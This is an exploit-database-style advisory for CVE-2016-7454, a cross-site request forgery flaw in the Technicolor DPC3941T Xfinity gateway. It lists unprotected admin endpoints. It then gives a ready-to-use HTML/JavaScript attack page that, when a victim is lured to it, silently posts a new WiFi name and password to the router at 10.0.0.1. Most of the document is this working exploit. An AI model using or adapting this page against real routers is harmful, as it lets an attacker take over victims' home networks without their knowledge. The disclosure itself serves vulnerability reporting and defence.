# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco) DPC3941T# Date: 09/08/2016# Exploit Author: Ayushman Dutta# Version:dpc3941-P20-18-v303r20421733-160413a-CMCST# CVE : CVE-2016-7454
The Device DPC3941T is vulnerable to CSRF and has no security on the entire
admin panel for it.
Some of the links are at:<IP Address>/actionHandler/ajax_remote_management.php
<IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php
<IP Address>/actionHandler/ajax_network_diagnostic_tools.php
<IP Address>/actionHandler/ajax_at_a_glance.php
A simple HTML page with javascript on which the attacker lures the victim
can be used to change state in the application.<html><head><title>
Lets CSRF Xfinity to change Wifi Password
</title></head><script>
function jsonreq(){
var json_upload ="configInfo="+ JSON.stringify({"radio_enable":"true","network_name":"MyName","wireless_mode":"a,n,ac","security":"WPAWPA2_PSK_TKIPAES","channel_automatic":"true","channel_number":"40","network_password":"password","broadcastSSID":"true","enableWMM":"true","ssid_number":"1"});
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;
xmlhttp.open("POST","
http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php",
true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.send(json_upload);}
jsonreq();</script></html>